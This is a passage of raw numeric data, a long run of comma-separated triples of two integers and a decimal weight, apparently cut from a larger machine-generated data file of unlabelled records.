0.09331),(109,24400,0.98),(109,24401,1.09669),(109,24402,1.02669),(109,24403,1.23669),(109,24404,0.95669),(109,24405,1.14331),(109,24406,0.93331),(109,24407,1.02669),(109,24408,0.28),(109,24409,0.98),(109,24410,1.14331),(109,24411,0.18669),(114,24411,0.18669),(111,24411,0.56007),(109,24412,1.12),(109,24413,1.21331),(109,24414,0.18669),(109,24415,0.95669),(109,24416,1.02669),(109,24417,0.23331),(111,24417,0.46662),(109,24418,0.93331),(109,24419,1.07331),(109,24420,0.14),(109,24421,0.84),(109,24422,0.95669),(109,24423,1.02669),(109,24424,1.07331),(109,24425,0.23331),(114,24425,0.23331),(111,24425,1.39986),(109,24426,0.93331),(109,24427,1.09669),(109,24428,0.91),(111,24428,0.91),(120,24428,0.91),(109,24429,1.00331),(109,24430,0.18669),(111,24430,1.12014),(109,24431,0.86331),(109,24432,0.95669),(109,24433,0.18669),(111,24433,1.12014),(109,24434,1.07331),(109,24435,1.21331),(109,24436,0.56),(109,24437,1.14331),(109,24438,1.30669),(109,24439,0.32669),(109,24440,0.98),(109,24441,1.07331),(109,24442,0.56),(109,24443,1.05),(109,24444,1.12),(109,24445,1.12),(109,24446,2.38),(109,24447,2.70662),(109,24448,0.37331),(109,24449,0.95669),(109,24450,1.14331),(109,24616,0.93331),(109,24617,1.00331),(109,24620,0.79331),(111,24620,3.17324),(109,24621,0.88669),(109,24622,0.79331),(109,24623,0.93331),(109,24632,0.81669),(114,24632,1.63338),(109,24633,1.00331),(109,24927,0.91),(109,24928,1.05),(109,24929,0.32669),(109,24930,0.95669),(109,24931,1.00331),(109,24932,0.32669),(109,24933,1.14331),(109,24934,1.23669),(109,24935,0.09331),(109,24936,0.91),(109,24937,1.14331),(109,24938,0.28),(109,24939,1.09669),(109,24940,1.16669),(109,24941,0.09331),(111,24941,0.18662),(109,24942,0.91),(109,24943,1.21331),(109,24944,0.37331),(109,24945,1.12),(109,24946,1.30669),(109,24947,0.09331),(121,24947,0.09331),(111,24947,0.27993),(109,24948,0.95669),(109,24949,1.02669),(109,24950,0.98),(109,24951,1.26),(109,24952,0.95669),(109,24953,1.05),(109,24954,0.56007),(121,24954,0.56007),(111,24954,0.93345),(109,24955,0.93331),(109,24956,1.12),(109,24957,0.95669),(109,24958,1.00331),(109,24959,0.93331),(109,24960,1.09669),(109,24961,0.74662),(109,24962,2.1),(109,24963,2.19338),(109,24964,0.84),(109,24965,1.12),(109,24966,1.26),(109,24967,1.00331),(109,24968,1.09669),(109,24969,0.28),(109,24970,1.09669),(109,24971,1.30669),(109,24972,0.28),(109,24973,0.91),(109,24974,1.05),(109,24975,0.32669),(109,24976,1.07331),(109,24977,1.14331),(109,24978,1.68),(109,24979,1.09669),(109,24980,1.14331),(109,24981,1.77338),(109,24982,1.09669),(109,24983,1.00331),(109,24984,1.77338),(109,24985,2.00662),(109,24986,0.09331),(111,24986,0.09331),(114,24986,0.09331),(109,24987,0.81669),(109,24988,0.91),(109,24989,0.23331),(111,24989,0.23331),(109,24990,0.95669),(109,24991,1.16669),(111,24992,0.23331),(109,24992,0.46662),(109,24993,2.24),(109,24994,2.66),(109,24995,0.91),(109,24996,1.09669),(109,24997,0.91),(109,24998,1.02669),(109,24999,0.88669),(109,25000,0.95669),(109,25001,0.91),(109,25002,1.05),(110,25150,0.88669),(110,25151,0.95669),(110,25152,0.95669),(110,25153,1.09669),(110,25154,0.91),(110,25155,1.16669),(110,25156,1.00331),(110,25157,1.12),(110,25158,0.86331),(110,25159,1.00331),(110,25160,0.84),(110,25161,0.95669),(110,25162,1.05),(110,25163,0.93331),(110,25164,1.16669),(110,25165,1.72662),(110,25166,1.02669),(110,25167,0.93331),(110,25168,0.93331),(110,25169,1.00331),(110,25170,0.98),(110,25171,1.14331),(110,25172,0.98),(110,25173,1.21331),(110,25174,0.93331),(110,25175,1.00331),(110,25176,0.88669),(110,25177,1.00331),(110,25178,1.12),(110,25179,0.91),(110,25180,0.98),(110,25181,0.84),(125,25181,0.84),(110,25182,1.02669),(110,25183,0.86331),(110,25184,0.93331),(110,25185,0.77),(110,25186,1.00331),(110,25187,0.84),(119,25187,0.84),(110,25188,1.02669),(110,25189,1.21331),(110,25190,1.30669),(110,25191,1.00331),(110,25192,0.91),(119,25192,0.91),(110,25193,1.19),(110,25194,0.98),(110,25195,1.19),(110,25196,0.88669),(110,25197,1.05),(110,25198,0.28),(110,25199,0.93331),(110,25200,1.07331),(110,25201,0.93338),(110,25202,1.02669),(110,25203,1.09669),(110,25204,1.00331),(110,25205,1.14331),(125,25206,0.37331),(110,25206,0.74662),(110,25207,0.95669),(110,25208,1.19),(110,25209,1.05),(110,25210,1.19),(110,25211,0.46669),(110,25212,1.05),(110,25213,1.14331),(110,25214,1.07331),(110,25215,0.65331),(110,25216,1.26),(110,25217,1.35331),(110,25218,0.51331),(110,25219,1.07331),(110,25220,1.26),(110,25221,0.56),(110,25222,1.05),(110,25223,1.26),(110,25224,0.7),(110,25225,1.19),(110,25226,1.30669),(110,25227,0.60669),(110,25228,1.09669),(110,25229,1.23669),(110,25230,0.28),(110,25231,0.91),(110,25232,1.14331),(110,25233,0.28),(110,25234,0.98),(110,25235,1.05),(110,25236,0.93338),(110,25237,1.07331),(110,25238,1.14331),(110,25239,1.12),(110,25240,1.33),(110,25241,0.37331),(110,25242,0.98),(110,25243,1.07331),(110,25244,0.18669),(110,25245,0.86331),(110,25246,0.95669),(110,25247,0.95669),(110,25248,1.14331),(110,25249,1.07331),(110,25250,1.19),(110,25251,0.28),(110,25252,0.91),(110,25253,1.16669),(110,25254,0.88669),(110,25255,0.98),(110,25256,0.88669),(110,25257,1.00331),(110,25258,1.07331),(110,25259,1.28331),(110,25260,0.93331),(110,25261,1.14331),(110,25262,0.95669),(110,25263,1.07331),(110,25264,0.46669),(112,25264,0.46669),(120,25264,0.93338),(110,25265,1.14331),(110,25266,1.33),(113,25267,0.32669),(110,25267,1.30676),(110,25268,0.95669),(110,25269,1.07331),(110,25270,1.05),(110,25271,1.19),(110,25272,1.07331),(110,25273,1.21331),(110,25274,1.02669),(110,25275,1.16669),(110,25276,0.42),(110,25277,0.98),(110,25278,1.07331),(110,25279,0.56),(110,25280,1.05),(110,25281,1.16669),(110,25282,1.19),(120,25283,0.51331),(110,25283,1.02662),(110,25284,1.05),(110,25285,1.19),(110,25286,1.02669),(110,25287,1.26),(110,25288,2.94),(110,25289,1.00331),(110,25290,1.16669),(110,25291,0.98),(110,25292,1.19),(110,25293,0.98),(110,25294,1.33),(110,25295,0.98),(110,25296,1.12),(110,25297,1.09669),(110,25298,1.35331),(110,25299,1.02669),(110,25300,1.09669),(110,25301,1.07331),(110,25302,1.28331),(110,25303,0.84),(110,25304,1.00331),(110,25305,1.19),(110,25306,1.00331),(110,25307,1.14331),(110,25308,0.46669),(110,25309,1.02669),(110,25310,1.12),(110,25311,1.40007),(110,25312,1.02669),(110,25313,1.26),(110,25314,1.09669),(110,25315,1.23669),(110,25316,1.12),(110,25317,1.21331),(110,25318,0.32669),(110,25319,0.93331),(110,25320,1.05),(110,25321,0.42),(110,25322,1.07331),(110,25323,1.12),(110,25324,1.12),(110,25325,0.88669),(120,25325,2.66007),(110,25326,0.98),(110,25327,1.00331),(110,25328,1.07331),(110,25329,0.14),(119,25329,0.14),(110,25330,0.84),(119,25330,0.84),(110,25331,1.05),(110,25332,0.28),(110,25333,1.05),(110,25334,1.14331),(110,25335,0.56),(110,25336,1.07331),(110,25337,1.30669),(110,25338,0.69993),(110,25339,0.91),(110,25340,1.09669),(110,25341,1.77338),(110,25342,0.95669),(110,25343,1.09669),(110,25344,0.42),(110,25345,1.00331),(110,25346,1.19),(110,25347,0.28),(110,25348,0.95669),(110,25349,1.05),(110,25350,0.37331),(110,25351,1.02669),(110,25352,1.28331),(110,25353,1.02669),(110,25354,1.16669),(110,25355,0.95669),(110,25356,1.07331),(110,25357,1.96),(110,25358,2.33338),(110,25359,0.95669),(110,25360,1.12),(110,25361,1.05),(110,25362,1.26),(110,25363,0.88669),(110,25364,1.12),(110,25365,0.93331),(110,25366,1.02669),(110,25367,0.88669),(110,25368,0.95669),(110,25369,1.82),(110,25370,1.14331),(110,25371,1.12),(110,25372,0.93331),(110,25373,1.00331),(110,25374,1.96),(110,25375,1.05),(110,25376,1.05),(110,25377,0.91),(110,25378,1.02669),(110,25379,0.28),(110,25380,1.12),(110,25381,1.30669),(110,25382,0.23331),(113,25382,0.23331),(110,25383,1.00331),(110,25384,1.07331),(110,25385,1.86662),(110,25386,2.14662),(110,25387,0.86331),(110,25388,1.07331),(110,25389,1.02669),(110,25390,0.88669),(118,25390,0.88669),(110,25391,1.00331),(110,25392,0.32669),(120,25392,0.32669),(110,25393,0.93331),(110,25394,1.19),(110,25395,0.42),(110,25396,1.14331),(110,25397,1.30669),(110,25398,1.02662),(110,25399,1.12),(110,25400,1.19),(110,25401,1.02669),(110,25402,1.26),(110,25403,2.61317),(110,25404,7.51317),(110,25405,1.26),(110,25406,5.95),(110,25407,1.14331),(110,25408,1.07331),(110,25409,1.28331),(110,25410,0.91),(110,25411,1.12),(110,25412,1.12),(110,25413,0.91),(110,25414,1.14331),(110,25415,0.98),(110,25416,1.05),(110,25417,0.98),(110,25418,1.07331),(110,25419,0.98),(110,25420,1.21331),(110,25421,1.02669),(110,25422,1.09669),(110,25423,0.93331),(113,25423,0.93331),(110,25424,1.00331),(110,25425,0.84),(110,25426,1.02669),(110,25427,1.05),(110,25428,1.14331),(110,25429,0.91),(110,25430,0.98),(110,25431,1.12),(110,25432,1.14331),(110,25433,0.98),(110,25434,1.00331),(110,25435,1.00331),(110,25436,1.77338),(110,25437,0.98),(110,25438,0.98),(110,25439,0.84),(110,25440,1.07331),(110,25441,1.72662),(110,25442,2.00662),(110,25443,0.98),(110,25444,1.07331),(110,25445,0.95669),(110,25446,1.02669),(110,25447,1.07331),(110,25448,1.19),(110,25449,0.95669),(110,25450,1.12),(110,25451,1.00331),(110,25452,1.07331),(110,25453,1.91338),(110,25454,1.05),(110,25455,1.02669),(110,25456,1.00331),(110,25457,1.23669),(110,25458,0.86331),(110,25459,0.98),(110,25460,2.00662),(110,25461,1.16669),(110,25462,1.14331),(110,25463,1.02669),(110,25464,1.09669),(110,25465,1.82),(110,25466,2.19338),(110,25467,0.95669),(110,25468,1.07331),(110,25469,1.12),(110,25470,1.19),(110,25471,0.98),(110,25472,1.07331),(110,25473,0.95669),(110,25474,1.12),(110,25475,0.91),(110,25476,1.14331),(110,25477,0.93331),(110,25478,1.16669),(110,25479,0.98),(110,25480,1.16669),(110,25481,0.93331),(110,25482,1.00331),(110,25483,0.91),(110,25484,0.98),(110,25485,0.86331),(113,25485,0.86331),(125,25485,0.86331),(110,25486,0.95669),(110,25487,1.72662),(110,25488,1.96),(110,25489,0.88669),(110,25490,1.09669),(110,25491,2.19338),(119,25492,0.84),(110,25492,1.68),(117,25492,1.68),(110,25493,0.93331),(110,25494,0.95669),(110,25495,3.08007),(110,25496,1.82),(110,25497,1.02669),(110,25498,1.05),(110,25499,0.88669),(110,25500,0.95669),(110,25501,1.05),(110,25502,1.12),(113,25503,0.84),(110,25503,10.08),(110,25504,0.98),(110,25505,0.98),(110,25506,1.00331),(110,25507,2.14662),(110,25508,2.05338),(110,25509,1.00331),(110,25510,1.09669),(110,25511,1.07331),(110,25512,1.00331),(110,25513,0.93331),(110,25514,1.05),(110,25515,1.14331),(110,25516,1.02669),(110,25517,1.09669),(110,25518,1.00331),(110,25519,1.26),(110,25520,0.88669),(110,25521,1.05),(110,25522,0.95669),(110,25523,1.02669),(110,25524,1.00331),(110,25525,1.23669),(110,25526,1.02669),(110,25527,1.23669),(110,25528,1.12),(110,25529,1.09669),(110,25530,0.91),(110,25531,1.00331),(110,25532,0.91),(110,25533,1.00331),(110,25534,0.88669),(117,25534,0.88669),(110,25535,0.98),(110,25536,0.93331),(110,25537,1.07331),(110,25538,0.95669),(110,25539,1.23669),(110,25540,0.91),(110,25541,0.98),(110,25542,0.32669),(125,25542,0.32669),(111,25542,0.98007),(110,25543,1.00331),(110,25544,1.12),(110,25545,0.60669),(110,25546,1.12),(110,25547,1.21331),(110,25548,1.02669),(110,25549,1.12),(110,25550,0.28),(112,25550,0.28),(110,25551,1.02669),(110,25552,1.07331),(110,25553,0.46669),(110,25554,1.00331),(110,25555,1.16669),(110,25556,1.72662),(110,25557,1.91338),(110,25558,0.93331),(110,25559,1.00331),(110,25560,0.91),(110,25561,0.98),(110,25562,0.93331),(110,25563,1.00331),(110,25564,0.93331),(110,25565,1.02669),(110,25566,2.05338),(110,25567,2.19338),(110,25568,1.05),(110,25569,1.26),(110,25570,0.95669),(110,25571,1.16669),(110,25572,1.82),(110,25573,1.96),(110,25574,1.00331),(110,25575,1.07331),(110,25576,0.93331),(110,25577,1.00331),(110,25578,1.07331),(110,25579,1.21331),(110,25580,1.77338),(110,25581,1.05),(110,25582,0.95669),(110,25583,2.00662),(110,25584,1.26),(110,25585,1.07331),(110,25586,0.88669),(110,25587,0.95669),(110,25588,0.93331),(110,25589,1.19),(110,25590,0.98),(110,25591,1.05),(110,25592,1.02669),(110,25593,1.09669),(110,25594,0.84),(110,25595,0.93331),(110,25596,1.09669),(110,25597,1.33),(110,25598,1.23669),(110,25599,1.05),(110,25600,1.07331),(110,25601,0.88669),(110,25602,0.95669),(110,25603,0.93331),(110,25604,1.09669),(110,25605,0.95669),(110,25606,1.02669),(110,25607,5.46),(110,25608,1.00331),(110,25609,0.98),(110,25610,1.19),(110,25611,1.96),(110,25612,0.98),(110,25613,1.00331),(110,25614,1.07331),(110,25615,0.98),(110,25616,1.09669),(110,25617,1.07331),(110,25618,1.16669),(110,25619,1.00331),(110,25620,1.12),(110,25621,0.95669),(110,25622,1.02669),(110,25623,1.05),(110,25624,1.23669),(110,25625,1.82),(110,25626,1.09669),(110,25627,1.05),(110,25628,0.91),(110,25629,1.00331),(110,25630,0.98),(110,25631,1.35331),(110,25632,0.86331),(110,25633,0.98),(110,25634,0.86331),(110,25635,1.00331),(110,25636,1.00331),(110,25637,1.09669),(110,25638,0.32669),(117,25638,0.65338),(110,25639,0.93331),(110,25640,1.00331),(110,25641,0.91),(110,25642,1.14331),(110,25643,0.46669),(110,25644,1.07331),(110,25645,1.16669),(110,25646,0.23331),(110,25647,0.88669),(110,25648,0.98),(128,25649,0.51331),(110,25649,1.02662),(110,25650,1.02669),(110,25651,1.12),(110,25652,1.14331),(110,25653,1.21331),(110,25654,0.95669),(110,25655,1.05),(110,25656,0.84),(110,25657,0.93331),(110,25658,0.98),(110,25659,1.14331),(110,25660,0.95669),(110,25661,1.07331),(110,25662,0.91),(110,25663,1.00331),(110,25664,0.86331),(110,25665,1.16669),(110,25666,0.93331),(110,25667,0.88669),(110,25668,1.02669),(110,25669,2.14662),(110,25670,0.93331),(110,25671,1.02669),(110,25672,0.86331),(113,25672,0.86331),(110,25673,0.98),(110,25674,0.46662),(110,25675,0.91),(110,25676,1.19),(110,25677,0.88669),(110,25678,1.16669),(110,25679,0.32669),(110,25680,0.95669),(110,25681,1.02669),(110,25682,0.14),(110,25683,0.84),(110,25684,0.93331),(110,25685,1.05),(110,25686,1.00331),(113,25686,1.00331),(110,25687,0.84),(110,25688,0.93331),(110,25689,0.81669),(110,25690,0.91),(110,25691,0.95669),(110,25692,1.05),(110,25693,0.81669),(110,25694,0.98),(110,25695,0.86331),(110,25696,0.93331),(110,25697,1.07331),(110,25698,1.16669),(110,25699,1.00331),(110,25700,1.30669),(110,25701,1.00331),(110,25702,1.07331),(110,25703,0.98007),(110,25704,1.05),(110,25705,1.26),(110,25706,1.00331),(110,25707,1.16669),(110,25708,1.09669),(110,25709,1.30669),(110,25710,0.46669),(110,25711,1.09669),(110,25712,1.37669),(110,25713,0.51331),(110,25714,1.07331),(110,25715,1.19),(110,25716,0.28),(110,25717,0.91),(110,25718,1.02669),(110,25719,0.88669),(110,25720,0.98),(110,25721,0.88669),(110,25722,1.07331),(110,25723,0.81669),(110,25724,0.95669),(110,25725,0.98),(110,25726,1.09669),(110,25727,0.88669),(110,25728,1.02669),(111,25728,2.05338),(110,25729,1.26),(110,25730,0.46669),(110,25731,1.00331),(110,25732,1.14331),(110,25733,0.46669),(110,25734,1.05),(110,25735,1.12),(110,25736,0.42),(110,25737,0.98),(110,25738,1.09669),(110,25739,1.09669),(110,25740,1.16669),(110,25741,0.28),(123,25741,0.28),(110,25742,1.77338),(110,25743,1.05),(110,25744,1.09669),(110,25745,0.46662),(110,25746,0.91),(110,25747,1.05),(110,25748,0.91),(110,25749,1.07331),(110,25750,0.65338),(110,25751,0.95669),(110,25752,1.02669),(110,25753,1.02669),(110,25754,1.07331),(110,25755,0.74662),(110,25756,1.26),(110,25757,1.4),(110,25758,0.98),(110,25759,1.12),(110,25760,0.28),(112,25760,0.56),(110,25761,0.93331),(110,25762,1.07331),(110,28485,0.77),(110,28486,0.86331),(110,28487,0.88669),(110,28488,0.95669),(110,28489,0.84),(110,28490,0.98),(110,28491,0.79331),(110,28492,1.02669),(110,28493,0.79331),(110,28494,0.93331),(110,28495,0.86331),(110,28496,0.95669),(110,28497,0.84),(110,28498,0.95669),(110,28499,0.95669),(110,28500,1.05),(120,28501,0.23331),(110,28501,0.46662),(110,28502,0.98),(110,28503,1.19),(110,28504,0.95669),(110,28505,1.00331),(110,28506,0.95669),(110,28507,1.07331),(110,28508,1.02669),(110,28509,1.09669),(110,28510,0.28),(110,28511,1.00331),(110,28512,1.05),(110,28513,0.95669),(110,28514,1.19),(110,28515,0.42),(125,28515,0.42),(110,28516,0.98),(110,28517,1.12),(110,28518,0.86331),(110,28519,1.09669),(110,28520,0.86331),(110,28521,0.95669),(110,28522,0.86331),(110,28523,1.05),(110,28524,0.88669),(110,28525,1.12),(110,28526,0.98),(110,28527,1.16669),(110,28528,0.98),(110,28529,1.12),(110,28530,1.00331),(110,28531,1.05),(110,28532,1.63317),(110,28533,2.66007),(110,28534,1.07331),(110,28535,1.07331),(110,28536,1.19),(110,28537,0.93331),(110,28538,1.00331),(110,28539,1.86662),(110,28540,1.02669),(110,28541,1.09669),(110,28542,0.91),(110,28543,1.02669),(110,28544,0.91),(110,28545,1.02669),(110,28546,0.32669),(110,28547,1.00331),(110,28548,1.12),(110,28549,0.93331),(110,28550,1.02669),(110,28551,0.23331),(118,28551,0.23331),(110,28552,0.93331),(110,28553,1.00331),(110,28554,0.88669),(110,28555,1.07331),(110,28556,0.91),(110,28557,1.14331),(110,28558,0.28),(110,28559,0.95669),(110,28560,1.05),(110,28561,1.00331),(110,28562,1.16669),(110,28563,1.12),(110,28564,1.02669),(110,28565,1.16669),(110,28566,0.98),(110,28567,1.26),(110,28568,0.32669),(110,28569,0.93331),(110,28570,1.14331),(110,28571,0.46662),(110,28572,0.95669),(110,28573,1.07331),(110,28574,1.05),(110,28575,1.14331),(110,28576,0.23331),(110,28577,1.00331),(110,28578,1.21331),(110,28579,0.95669),(110,28580,1.07331),(110,28581,1.14331),(110,28582,0.95669),(110,28583,1.23669),(110,28584,1.07331),(110,28585,1.14331),(111,28586,0.18669),(110,28586,1.12014),(110,28587,0.95669),(110,28588,1.02669),(110,28589,1.12),(110,28590,1.19),(110,28591,0.91),(110,28592,0.98),(110,28593,1.02669),(110,28594,1.09669),(110,28595,2.00662),(110,28596,1.12),(110,28597,1.12),(110,28598,0.56),(110,28599,0.93331),(110,28600,1.14331),(110,28601,0.95669),(110,28602,1.05),(110,28603,1.21331),(110,28604,1.30669),(110,28605,1.16669),(110,28606,1.35331),(110,28607,0.93331),(110,28608,1.07331),(110,28609,0.18669),(117,28609,0.18669),(120,28609,0.18669),(113,28609,0.37338),(110,28610,0.84),(110,28611,1.05),(110,28612,0.23331),(110,28613,1.02669),(110,28614,1.21331),(110,28615,1.09669),(110,28616,1.19),(110,28617,0.51331),(110,28618,1.14331),(110,28619,1.4),(110,28620,0.56),(110,28621,1.14331),(110,28622,1.30669),(110,28623,11.7608),(110,28624,0.91),(110,28625,3.82676),(110,28626,1.07331),(110,28627,3.15),(110,28628,0.93331),(110,28629,1.09669),(110,28630,1.00331),(110,28631,1.07331),(110,28632,0.95669),(110,28633,1.14331),(110,28634,1.86662),(110,28635,2.19338),(110,28636,1.14331),(110,28637,1.37669),(110,28638,0.93331),(110,28639,1.02669),(110,28640,0.93331),(110,28641,1.02669),(110,28642,0.93331),(110,28643,1.02669),(110,28644,1.02669),(110,28645,1.12),(110,28646,1.05),(110,28647,1.21331),(110,28648,1.12),(110,28649,1.30669),(110,28650,1.09669),(110,28651,1.19),(110,28652,2.14662),(110,28653,1.12),(110,28654,1.23669),(110,28655,3.21993),(110,28656,1.14331),(110,28657,2.33338),(110,28658,0.98),(110,28659,1.07331),(110,28660,1.05),(110,28661,1.12),(110,28662,0.95669),(110,28663,1.19),(110,28664,1.86662),(110,28665,2.05338),(110,28666,0.98),(110,28667,1.16669),(110,28668,0.98),(110,28669,1.23669),(110,28670,2.00662),(110,28671,1.26),(110,28672,1.28331),(110,28673,2.94),(110,28674,1.05),(110,28675,1.19),(110,28676,1.09669),(110,28677,1.09669),(110,28678,1.19),(110,28679,0.42),(110,28680,1.02669),(110,28681,1.23669),(110,28682,0.32669),(110,28683,1.05),(110,28684,1.21331),(110,28685,0.42),(110,28686,1.09669),(110,28687,1.26),(110,28688,0.93331),(110,28689,1.00331),(110,28690,0.91),(110,28691,1.05),(110,28692,2.24),(110,28693,1.77338),(110,28694,1.07331),(110,28695,1.12),(110,28696,2.87007),(110,28697,1.05),(110,28698,1.02669),(110,28699,1.02669),(110,28700,0.95669),(110,28701,1.02669),(110,28702,0.84),(110,28703,0.98),(110,28704,1.05),(110,28705,1.00331),(110,28706,1.12),(110,28707,0.91),(110,28708,1.00331),(110,28709,0.46669),(110,28710,1.05),(110,28711,1.12),(110,28712,0.14),(110,28713,0.98),(110,28714,1.12),(110,28715,1.00331),(110,28716,1.09669),(110,28717,0.95669),(110,28718,1.23669),(110,28719,0.95669),(110,28720,1.16669),(110,28721,0.56),(110,28722,1.12),(110,28723,1.30669),(110,28724,0.28),(123,28724,0.84),(110,28725,1.05),(110,28726,1.23669),(110,28727,0.23331),(110,28728,0.91),(110,28729,1.16669),(110,28730,2.00662),(110,28731,1.21331),(110,28732,1.16669),(110,28733,0.98007),(110,28734,1.02669),(110,28735,1.21331),(110,28736,1.86662),(110,28737,2.05338),(110,28738,0.46669),(110,28739,1.12),(110,28740,1.28331),(110,28741,0.28),(110,28742,1.02669),(110,28743,1.09669),(110,28744,0.42),(126,28744,0.42),(110,28745,0.98),(126,28745,0.98),(110,28746,1.16669),(110,28747,0.56),(110,28748,1.07331),(110,28749,1.16669),(110,28750,2.24),(110,28751,1.21331),(110,28752,1.30669),(110,28753,1.23669),(110,28754,1.33),(110,28755,1.23669),(110,28756,1.4),(110,28757,1.07331),(110,28758,1.30669),(110,28759,0.51331),(110,28760,1.23669),(110,28761,1.4),(110,28762,0.42),(110,28763,1.14331),(110,28764,1.21331),(110,28765,1.40007),(110,28766,3.36),(110,28767,1.30669),(110,28768,1.26),(110,28769,1.35331),(110,28770,0.95669),(110,28771,1.07331),(110,28772,1.16669),(110,28773,0.95669),(110,28774,1.00331),(110,28775,0.46669),(110,28776,1.14331),(110,28777,1.21331),(110,28778,0.42),(110,28779,1.00331),(110,28780,1.14331),(110,28781,0.98),(110,28782,1.05),(110,28783,7.69965),(110,28784,2.1),(110,28785,1.12),(110,28786,1.26),(110,28787,2.33338),(110,28788,2.52),(110,28789,1.02669),(110,28790,1.14331),(110,28791,1.16669),(110,28792,1.30669),(110,28793,2.05338),(110,28794,1.23669),(110,28795,1.21331),(110,28796,1.19),(110,28797,1.4),(110,28798,3.57),(110,28799,2.56662),(110,28800,1.33),(110,28801,1.14331),(110,28802,1.35331),(110,28803,1.14331),(110,28804,1.35331),(110,28805,1.07331),(110,28806,1.23669),(111,29630,0.81669),(111,29631,1.02669),(111,29632,0.95669),(111,29633,1.00331),(111,29634,0.86331),(111,29635,1.09669),(111,29636,0.86331),(111,29637,0.93331),(111,29638,0.81669),(111,29639,0.86331),(111,29640,0.93331),(111,29641,1.16669),(111,29642,0.88669),(111,29643,1.05),(111,29644,0.81669),(111,29645,0.95669),(111,29646,0.88669),(111,29647,1.00331),(111,29648,3.92028),(111,29649,1.07331),(111,29650,1.21331),(111,29651,1.00331),(111,29652,1.19),(111,29653,1.26),(111,29654,1.4),(111,29655,0.93331),(111,29656,1.16669),(111,29657,1.00331),(111,29658,1.16669),(111,29659,0.93331),(111,29660,1.07331),(111,29661,1.07331),(111,29662,1.16669),(111,29663,1.02669),(111,29664,1.21331),(111,29665,1.05),(111,29666,1.12),(111,29667,1.00331),(111,29668,1.28331),(111,29669,1.91338),(111,29670,1.21331),(111,29671,1.09669),(111,29672,0.7),(111,29673,1.19),(111,29674,1.26),(111,29675,0.32669),(111,29676,0.98),(111,29677,1.19),(111,29678,0.42),(111,29679,1.09669),(111,29680,1.19),(111,29681,0.46669),(111,29682,1.09669),(111,29683,1.35331),(111,29684,0.32669),(111,29685,1.00331),(111,29686,1.19),(111,29687,2.24),(111,29688,1.16669),(111,29689,1.37669),(111,29690,2.1),(111,29691,1.30669),(111,29692,1.16669),(111,29693,1.09669),(111,29694,1.26),(111,29695,0.46669),(111,29696,1.00331),(111,29697,1.23669),(111,29698,0.28),(111,29699,1.00331),(111,29700,1.16669),(111,29701,0.37331),(111,29702,0.98),(111,29703,1.14331),(111,29704,0.74662),(111,29705,1.02669),(111,29706,1.12),(111,29707,0.98),(111,29708,1.05),(111,29709,0.23331),(111,29710,0.86331),(111,29711,1.02669),(111,29712,0.81669),(111,29713,1.00331),(111,29714,0.93331),(111,29715,1.19),(111,29716,0.86331),(111,29717,0.91),(111,29718,0.91),(111,29719,0.98),(111,29720,0.88669),(111,29721,0.98),(111,29722,0.28),(111,29723,1.23669),(111,29724,1.30669),(111,29725,0.91),(111,29726,0.37338),(111,29727,1.07331),(111,29728,1.16669),(111,29729,1.07331),(111,29730,1.16669),(111,29731,1.00331),(111,29732,1.09669),(111,29733,1.07331),(111,29734,1.16669),(111,29735,0.98),(111,29736,1.33),(111,29737,0.18669),(111,29738,0.93331),(111,29739,0.98),(111,29740,0.23331),(111,29741,0.95669),(111,29742,1.00331),(111,29743,0.28),(111,29744,1.16669),(111,29745,1.4),(111,29746,0.23331),(111,29747,1.00331),(111,29748,1.05),(111,29749,1.05),(111,29750,1.23669),(111,29751,0.88669),(111,29752,1.05),(111,29753,0.23331),(111,29754,0.98),(111,29755,1.23669),(111,29756,0.42),(111,29757,1.05),(111,29758,1.26),(111,29759,0.65331),(111,29760,1.23669),(111,29761,1.33),(111,29762,0.95669),(111,29763,1.21331),(111,29764,0.95669),(111,29765,1.30669),(111,29766,1.02669),(111,29767,1.14331),(111,29768,0.88669),(111,29769,0.98),(111,29770,0.91),(111,29771,1.05),(111,29772,0.91),(111,29773,1.12),(111,29774,0.28),(111,29775,1.12),(111,29776,1.26),(111,29777,1.00331),(111,29778,1.00331),(125,29778,1.00331),(111,29779,1.12),(111,29780,0.32669),(111,29781,0.93331),(111,29782,1.05),(111,29783,0.28),(111,29784,0.91),(111,29785,1.02669),(111,29786,0.28),(111,29787,1.00331),(111,29788,1.09669),(111,29789,0.28),(111,29790,1.00331),(111,29791,1.07331),(111,29792,1.07331),(111,29793,1.16669),(111,29794,0.98),(111,29795,1.02669),(111,29796,1.05),(111,29797,1.12),(111,29798,0.98),(111,29799,1.14331),(111,29800,1.14331),(111,29801,1.35331),(111,29802,1.05),(111,29803,1.21331),(111,29804,1.72662),(111,29805,1.00331),(111,29806,1.02669),(111,29807,0.86331),(111,29808,0.95669),(111,29809,0.86331),(111,29810,1.05),(111,29811,0.84),(111,29812,1.07331),(111,29813,1.02669),(111,29814,1.12),(111,29815,0.88669),(111,29816,1.05),(111,29817,0.95669),(111,29818,1.09669),(111,29819,1.00331),(111,29820,1.16669),(111,29821,0.32669),(111,29822,1.02669),(111,29823,1.09669),(111,29824,1.19),(111,29825,1.16669),(111,29826,1.00331),(111,29827,1.16669),(111,29828,0.18669),(111,29829,0.86331),(111,29830,1.05),(111,29831,0.37331),(111,29832,0.93331),(111,29833,1.02669),(111,29834,0.60669),(111,29835,1.09669),(111,29836,1.19),(111,29837,0.37331),(111,29838,1.05),(111,29839,1.14331),(111,29840,0.79331),(111,29841,0.86331),(111,29842,1.21331),(111,29843,1.4),(111,29844,0.32669),(111,29845,0.95669),(111,29846,1.00331),(111,29847,0.28),(111,29848,0.93331),(111,29849,1.12),(111,29850,0.37331),(111,29851,0.95669),(111,29852,1.12),(111,29853,0.93338),(111,29854,1.02669),(111,29855,1.26),(111,29856,1.09669),(111,29857,1.30669),(111,29858,0.51331),(111,29859,1.05),(111,29860,1.14331),(111,29861,0.18669),(111,29862,0.93331),(111,29863,1.19),(111,29864,0.69993),(111,29865,0.95669),(111,29866,1.19),(111,29867,0.88669),(111,29868,1.05),(111,29869,0.88669),(111,29870,1.16669),(111,29871,0.28),(111,29872,0.91),(111,29873,1.05),(111,29874,0.28),(111,29875,0.91),(111,29876,1.05),(111,29877,0.28),(111,29878,0.88669),(111,29879,1.02669),(111,29880,0.32669),(111,29881,1.00331),(111,29882,1.19),(111,30342,0.81669),(111,30343,1.05),(111,30344,0.84),(111,30345,0.91),(111,30349,0.91),(111,30351,0.81669),(111,30352,0.95669),(111,30355,0.93331),(111,30356,1.12),(111,30357,0.95669),(111,30358,1.02669),(111,30362,1.12),(111,30363,1.37669),(111,30364,0.95669),(111,30365,1.21331),(111,30366,0.93331),(111,30367,1.14331),(111,30368,0.86331),(111,30369,0.93331),(111,30372,1.05),(111,30374,0.98),(111,30375,0